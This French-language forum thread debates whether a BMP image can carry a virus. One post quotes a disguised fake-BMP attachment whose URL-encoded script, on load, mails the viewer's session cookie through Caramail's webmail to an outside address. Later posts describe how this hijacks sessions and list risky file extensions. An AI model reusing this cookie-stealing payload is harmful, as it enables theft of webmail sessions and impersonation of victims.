Reprise du message précédent :

non je connais le gars en question et je te dis que c'est pas une double extension ...
 
en plus ca je sais deja de moi meme qu'a partir d'une terminaison en .bmp on peut faire executer une page HTML et donc des javascript ...

mais pour quil est virus, il fo qu'il est un bout de code executable, ce qui est pas le cas d'un jpg, franchement je pense que c completement impossible

nope. A moins d'avoir préalablement changer l'attribution d'ouverture de l'extension bmp, c'est impossible. Lire un BMP est enfantin et il n'y a besoin d'aucune routine spécifique, donc aucune faille pour une exécution quleconque.

donc tu dis que ce que je sais faire puisque j'ai su le faire c'est du mytho ???  
 
attendez je vous retrouve ca ... ce genre de magouille est tres utilisé sur caramail pour recuperer les chers et tendres cookies .. mais je ne vais pas expliquer comment ....

et jeannot tu vas voir à la fin c moi qui v avoir raison

gizmo> je suis d'accord avec toi sur le fait que lire un bmp est enfantin, mais si tu fou IE comme viewer par defaut de tes bmp ca ne m'etonnerait meme pas qu'il y ai une faille la dedans pour executer un code quelconque  

Tedd007 a écrit a écrit : gizmo> je suis d'accord avec toi sur le fait que lire un bmp est enfantin, mais si tu fou IE comme viewer par defaut de tes bmp ca ne m'etonnerait meme pas qu'il y ai une faille la dedans pour executer un code quelconque

 
et encore, ca m'étonnerait qu'ils laissent une bourde pareil d'une version a l'autre, si elle existe..

J'essaye de prouver que les bmp permettent de transporter du code mais multimania veut pas me permttre d'upper le truc ...

mail.

 
Je suis d'accord avec toi... on peut TRANSPORTER du code, mais de la a l'executer...

Oki je mail l'exemple que j'ai trouvé a guizmo ...
 
je l'ai mis sous zip pour m'eviter de l'ouvrir par erreur (ne sachant pas si caramail avait desactivé ce code ou pas)

j'ai envoyé le bmp enfin soit disant bmp et en fait voici ce que l'on obtiens quand au lieu de le telecharger en bmp on le telecharge en .txt :
 
<script>
<!--
document.write(unescape("%3Chtml%3E%0D%0A%3Cbody%20ONLOAD%3D%22window.location%3D%27http%3A//www30.caramail.com/cgi-bin/SelectAction%3FDEALIAS%3D0%26MAILTO%3Dpar.ici.le.cookie@caramail.com%26SUBJECT%3D%26BODY%3D%27%20+%20window.document.cookie%20+%20%27%26TARGETACTION%3DNONE%27%3B%22%3E%0D%0A%3C/body%3E%20%0D%0A%3C/html%3E" ));
//-->
<!--AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//-->
</script>
 
 
j'ai coupé les A ... logiquement y en a bcp plus juste pour faire grimper la taille du fichier et faire reelement croire que c un bmp

[edtdd]--Message édité par sigma_me--[/edtdd]

bon j'ai toujours pas recu ton mail, mais en attendant, j'ai testé le code que tu a mis ici et:
 
- ACDSEE m'ouvre un image vide
- Opera m'ouvre une image non chargée
- IE m'ouvre ACDSEE
 
... alors j'espère que le mail sera plus concluant pour toi.

N'importe quel viewer te montrera ou rien ou un message d'erreur.  Maintenant peut etre que caramail est assez con pour interpreter les images bmp comme etant des script html :-))

Pas que caramail ...

Bref apparement de toute facon parler avec vous est cause perdue ...  
 
a partir du moment ou c faisable que ca vienne de caramail de ie ou de jenesaisquoi... que ce script que j'ai copier la se presente sous l'icone d'un .bmp et sous son extension montre bien que c'est réalisable !  
 
apres est ce que c'est possible que de réels virus se cachent le dessous pk pas !!

C'est claire que si IE a reellement une faille permettant d'executer ce genre de fichier c'est une grosse faille...

apres moi je garantie pas dans la réalisation ce qui est possible ou pas ...
 
hélas j'ai toujours pas le courage de me mettre a programmer mais etant donné que ie et autres navigateurs gerent des script ... on peut parler des css par exemple ... ca peut entrainer bcp de chose ...

je me suis bien marré en lisant ce tomic (surtout sigma)
 
pour info, ton script ne peut etre executé si placé dans un fichier .bmp pour la simple et bonne raison que toute appli qui essaye de lire un fichier bmp, s'attend à trouver une signature BM pour un bmp et un format bien specifique. Ton script ne satisfait nullement à ces exigences et donc toute application sachant lire un bmp, te dira gentillement ton fichier est merdique j'en veux pas. Pour info, j'ai essayé avec IE (au cas ou les gros cons de chez mikeysoft auraient eu la bonne idee d'interpreter du
script dans un bmp et rien, kedale, ton script ne marche pas et ne pourra jamais marcher avec comme extenssion .bmp)
 
Quant aux fantasmes sur du buffer overrun, les chances pour que ca puisse se produire sont infimes. Meme si qcqn arrive à trouver une faille, elle ne concernera qu'une seule appli...

alors je suis tout ouie ... comment est ce qu'en ouvrant ce fichier notre joli cookie caramail partait dans la boite spécifié ???
 
tours de magie ... je ne crois pas que david copperfiel est le temps pour ca

autre exemple dans le meme genre ne connaissez vous pas les bmp caché dans un .txt ?

 
si tu ne me crois pas, fais le test toi meme : tu cree un nouveau fichier, tu y colle le script, tu changes son extenssion en bmp puis tu ouvres avec IE. Moi tout ce que j'ai constaté c'est que IE prend le bmp, voit que l'image est foireuse et me met un X rouge...

sauf que ce n'est pas fait comme ca a la base c'est pour ca que tu ne peux pas le reproduire !!

C'est juste que caramail ne se base pas sur l'extention du fichier pour déterminer la façon de l'ouvrir mais sur le contenu (ou l'entête).
Donc il va interpêter le script tout simplement et non tanter de l'ouvrir comme étant un bmp.

je dis juste que ce que j'ai envoyer a guizmo, et qui apparement sous windows se concretise sous l'icone bmp et l'extension bmp alors que ca n'en est pas un, n'est qu'un exemple...
 
un .txt peut cacher une image .bmp  
ca c'est les exemples que je connais pour les avoir eu en main alors pk s'attendre a plus important ?
 
c'est surtout la que je veux en venir ... et que je veux qu'on me prouve reelement que ce n'est pas possible ...

 
la je vous suis plus, à quel moment ce script est censé s'executer d'aprez vous ? parce que s'il est executé sur le serveur de caramail, on s'en fout completement s'ils sont suffisament stupides pour permettre ce genre de comportement aberrant tant pis pour eux. Par contre je suis sur ke sur ma machine, en tant que bmp, ce script ne sera pas executé.

un bmp est une suite de chiffres...un prog pour l'afficher ne fait ke lire ces chiffres dans l'ordre ou ils arrivent et afficher pour chake pixel la couleur correspondante (je simplifie un peu...:D), donc aucun code ne peut etre exécuté là-dedans...

j'ai pas tout suivi mais tu parles de chiffres pour un bmp je pense donc hexadecimal ...
(euh tu me parles de bmp poru quel exemples celui du script cara ? ou du txt ? )
 
hexa me fait penser aussi a ce qui est possible en assembleur il me semble mais la je commence a m'embrouiller je crois.

 
Ben si justement caramail spécifie la liste des fichiers attachés (donc ton script qui est en fait une petite page html avec l'extention bmp) et qd tu cliques dessus il l'ouvre comme étant une page html et donc le script s'exécute.
Celà permet par exemple comme cité plus haut de se faire envoyer par mail le cookie de la personne ayant exécuté ce script et avec ce cookie se faire passer pour cette personnes auprès du serveur pour une durée de 6h (après quoi le cookie de session n'est plus valide)
Cela a été testé et aprouvé, ça marche.
Enfin avant c'était bien plus dramatique on pouvait y'a pas si longtmps, envoyer des mail en html sur cara et cacher des scripts à l'interreur même d'un tag <img> là l'exécution du script était forcée sans avoir besoin de faire cliquer la victime sur quoi que ce sois, heureusement cette faille a été corrigée mais il en reste encore bcp d'autre...

[edtdd]--Message édité par Jer--[/edtdd]

Ouai je commence a y voir clair et aussi l'origine de cette rumeur , ce qui est valable pour caramail ne le sera pas pour une piece jointe par email...
 
Et ce qui est de recuperer un cookies n'est pas la meme chose que d'infecter un pc...
 
Tient pour ceux qui ne font que lire ce topic voici une liste d'extension contenent du code excutable et donc possible d'avoir des propriétés virale :
 
 
.ade: Microsoft Access project extension
.adp: Microsoft Access project
.bas: Microsoft Visual Basic class module
.bat: Batch file
.chm: Compiled HTML Help file
.cmd: Microsoft Windows NT Command script
.com: Microsoft MS-DOS program
.cpl: Control Panel extension
.crt: Security certificate
.exe: Program
.hlp: Help file
.hta: HTML program
.inf: Setup Information
.ins: Internet Naming Service
.isp: Internet Communication settings
.js: JScript file
.jse: Jscript Encoded Script file
.lnk: Shortcut
.mdb: Microsoft Access program
.mde: Microsoft Access MDE database
.msc: Microsoft Common Console document
.msi: Microsoft Windows Installer package
.msp: Microsoft Windows Installer patch
.mst: Microsoft Visual Test source files
.pcd: Photo CD image, Microsoft Visual compiled script
.pif: Shortcut to MS-DOS program
.reg: Registration entries
.scr: Screen saver
.sct: Windows Script Component
.shs: Shell Scrap object
.shb: Shell Scrap object
.url: Internet shortcut
.vb: VBScript file
.vbe: VBScript Encoded script file
.vbs: VBScript file
.wsc: Windows Script Component
.wsf: Windows Script file
.wsh: Windows Script Host Settings file
 
Y'a d'autre extension arajouter a cette liste ?

si tu veux sigma, je suis pret à te mettre un bout de code C++ qui permet de lire un .bmp et la tu pourra voir ke ca ne peut en aucun cas interpreter du scrip.

Réponse sur un autre forum:
 
"
 
Auteur: Roland Garcia (---.abo.wanadoo.fr)
Date:   07-12-01 23:43
 
On peut cacher un virus dans ce qu'on veut, une archive ZIP avec mot de passe, dans une image par stéganographie, un fichier codé PGP etc....
On a caché un virus mais on n'a pas un virus.
 
Les fichiers ZIP, MP3, GIF, JPEG, PGP etc.... ne sont jamais des virus.
 
"

Oui mais le c++ est langage de programmation certes ... mais dans ma logique je pensais plus au possibilité de l'assembleur ...

donc en gros y a presence d'un virus sans activation de celui ci ? j'ai bien compris cette fois ?
 
(me laisse quand meme perplexe)

nope, composantes RGB!

 
j'ai aussi fait de l'assembleur, et je peux t'assurer que c'est impossible. L'assembleur ce n'est qu'un language qui permet d'associer des mnemoniques aux opcodes (les codes hexa) il est donc plus simple d'ecrire nop que de mettre un 0x90 ou int à la place de 0xCD etc. Par contre pour que le systeme puisse interpreter du code, il faut tout plein de choses : une bonne extenssion (.exe ou .com .pif ....) et un format specifique pour le programme.

euh la franchement vous commencez a me larguer ... (va vraiment falloir que je reprenne des etudes enfin des etudes en info moi)
 
cependant sans mettre en doute les réponses de chacun je vais quand meme demander l'avis de mon spécialiste en la matière enfin du moins si je le trouve

alors possible ou non?

apparement non ...
 
mais je garde toujours le doute

sigma_me a écrit a écrit : euh la franchement vous commencez a me larguer ... (va vraiment falloir que je reprenne des etudes enfin des etudes en info moi)   cependant sans mettre en doute les réponses de chacun je vais quand meme demander l'avis de mon spécialiste en la matière enfin du moins si je le trouve

à première vue on est plusieurs programmeurs là et certains à avoir étudié le format bmp...je t'assure k'il n'y a absolument pas de moyen de faire exécuter du code par un logiciel d'affichage de bmp...ou alors c le programmeur du logiciel ki voulait pouvoir faire d conneries!

skeye a écrit a écrit :   à première vue on est plusieurs programmeurs là et certains à avoir étudié le format bmp...je t'assure k'il n'y a absolument pas de moyen de faire exécuter du code par un logiciel d'affichage de bmp...ou alors c le programmeur du logiciel ki voulait pouvoir faire d conneries!

question encore : vous parlez d'ouvrir l'image avec un logiciel spécifié ... en double cliquant sur l'icone de l'image ne peut-elle pas choisir de s'ouvrir dans autre chose que les logiciels d'image ?
 
euh c'est un peu tordu mais bon j'essaye d'imaginer des trucs